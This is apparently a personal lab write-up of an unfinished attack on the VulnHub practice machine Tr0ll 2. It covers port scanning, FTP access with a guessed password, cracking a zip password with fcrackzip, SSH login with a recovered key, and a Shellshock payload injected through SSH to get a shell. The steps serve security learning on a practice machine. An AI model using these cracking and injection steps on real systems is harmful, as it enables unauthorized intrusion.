NOTES ABOUT Tr0ll 2
[ 2022-09-26 ] [ VulnHub / Tr0ll 2 ]Status: On going - inside as user
Skills: Port Scanning, FTP, Zip Cracking , SSH, ShellShock
Tools: nmap, strings, wfufcrackzip, ftp
PORT SCANNING
$ nmap -v -sS -A -p- 10.0.2.7
[...]
/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 82:fe:93:b8:fb:38:a6:77:b5:a6:25:78:6b:35:e2:a8 (DSA)
| 2048 7d:a5:99:b8:fb:67:65:c9:64:86:aa:2c:d6:ca:08:5d (RSA)
|_ 256 91:b8:6a:45:be:41:fd:c8:14:b5:02:a0:66:7c:8c:96 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.2.22 (Ubuntu)
[...]
GETTING IN
$ strings cat_the_troll.jpg
[...]
Look Deep within y0ur_self for the answer
$ wget http://10.0.2.7/y0ur_self/answer.txt
$ cat answer.txt | base64 -d > answer2.txt
$ ftp Tr0ll@10.0.2.7
Connected to 10.0.2.7.
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
331 Please specify the password.
Password: Tr0ll
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||7387|).
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 1474 Oct 04 2014 lmao.zip
226 Directory send OK.
ftp> get lmao.zip
local: lmao.zip remote: lmao.zip
229 Entering Extended Passive Mode (|||18218|).
150 Opening BINARY mode data connection for lmao.zip (1474 bytes).
100% |********************************| 1474 22.31 MiB/s 00:00 ETA
226 Transfer complete.
1474 bytes received in 00:00 (1.33 MiB/s)
ftp> quit
221 Goodbye.
$ fcrackzip -v -D -u -p ./answer2.txt lmao.zip
found file 'noob', (size cp/uc 1300/ 1679, flags 9, chk 1005)
PASSWORD FOUND!!!!: pw == ItCantReallyBeThisEasyRightLOL
$unzip lmao.zip
Archive: lmao.zip
[lmao.zip] noob password:
inflating: noob
$ file noob
noob: PEM RSA private key
$ ssh -i ./noob noob@10.0.2.7
sign_and_send_pubkey: no mutual signature supported
[...]
noob@10.0.2.7: Permission denied (publickey,password).
$ ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i ./noob noob@10.0.2.7
TRY HARDER LOL!
Connection to 10.0.2.7 closed.
$ ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i ./noob noob@10.0.2.7 '() { :;}; /bin/bash'
python -c 'import pty; pty.spawn("/bin/bash")'